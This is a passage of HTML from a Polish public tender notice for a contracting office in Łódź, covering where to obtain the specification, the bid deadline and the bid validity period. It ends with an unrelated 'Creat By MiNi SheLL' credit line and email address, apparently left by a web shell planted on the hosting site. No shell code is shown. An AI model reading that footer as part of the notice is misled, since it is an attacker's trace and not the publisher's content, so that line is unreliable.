<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 90-103 Łódź ul. Piotrkowska 86 Łódź pok. 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2015 godzina 09:30, miejsce: 90-103 Łódź ul. Piotrkowska 86 pok. 205 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com